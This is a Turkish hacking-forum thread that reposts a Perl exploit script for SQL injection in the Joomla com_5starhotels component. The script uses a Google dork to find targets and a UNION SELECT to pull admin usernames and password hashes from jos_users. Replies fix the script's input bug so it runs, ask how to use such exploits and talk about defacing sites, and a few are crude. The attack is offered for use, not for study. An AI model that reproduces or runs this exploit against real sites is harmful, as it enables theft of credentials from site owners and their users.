

Joomla Exploit! Milw0rmdan Önce TBT
-
#!/usr/bin/perl -w#Joomla com_5starhotels Sql injection##########################################[~] Author : EcHoLL#[~] www.warezturk.org www.tahribat.com#[~] Greetz : Black_label TURK Godlike Nitrous#[!] Module_Name: com_5starhotels#[!] Script_Name: Joomla#[!] Google_Dork: inurl:"com_5starhotels"########################################system("color FF0000");system("Nohacking");print "\t\t-------------------------------------------------------------\n\n";print "\t\t| Turkish Securtiy Team |\n\n";print "\t\t-------------------------------------------------------------\n\n";print "\t\t|Joomla Module com_5starhotels(showhoteldetails&id=)Remote SQL Injection Vuln|\n\n";print "\t\t| Coded by: EcHoLL www.warezturk.org |\n\n";print "\t\t-------------------------------------------------------------\n\n";use LWP::UserAgent;print "\nSite ismi Target page:[http://wwww.site.com/path/]: ";chomp(my $target=);$column_name="concat(username,0x3a,password)";$table_name="jos_users";$b = LWP::UserAgent->new() or die "Could not initialize browser\n";$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');$host = $target . "/index.php?option=com_5starhotels&task=showhoteldetails&id=1+union+select+1,".$column_name."+from/**/".$table_name."--";$res = $b->request(HTTP::Request->new(GET=>$host));$answer = $res->content; if ($answer =~/([0-9a-fA-F]{32})/){print "\n[+] Admin Hash : $1\n\n";print "# Tebrikler Exploit Calisti! #\n\n";}else{print "\n[-] Exploit Bulunamadı...\n";}
-
Joomlada orospu oldu :)=
edit: paylaşım için saollasın eskiden olsa exploiti hemen denerdim nedense hiç kullanasım yok yaşlanıyorum acaba ondanmı ki? heves kalmadı heves körerdik a.q -
bende öyle artık sıktı çünkü birde özellikle
zone-h için durmadan site kasanlar yok mu ne akla ne amaca hizmetediyorlar anlamadım gecelerini gündüzünü okulunu işini aksatıp zoneye çalışan elemanlar var hiçbir kazançları yok bunu uğruna kazançları olan işlerdende nasiplenemiyorlar yazık yaa -
C:\Perl>perl real.pl
syntax error at real.pl line 28, near "=)"
Execution of real.pl aborted due to compilation errors. -
joomla da sorun yok. modülleri yazanların amatörlüğü o. dogru duzgun modüller kullanırsanız hacklenmezsiniz
-
@mosquit0
chomp(my $target=<STDIN> ); şöyle değiştirince çalışıyor.

http://img255.imageshack.us/img255/6346/k5qt7.jpg
-
nasıl kullanılıyo bu exploitler :/
-
sağolasın nitro :).
edit: otel modülü içinmiş. yine de bulunsun bi köşede :).
-
deneyelim yaw zarar çıkmaz :D
-
BENDE ÇALIŞMADI YAW
-
http://www.milw0rm.com/exploits/7575
milw0rm de yayınlandı :) biraz önce
Toplam Hit: 3561 Toplam Mesaj: 13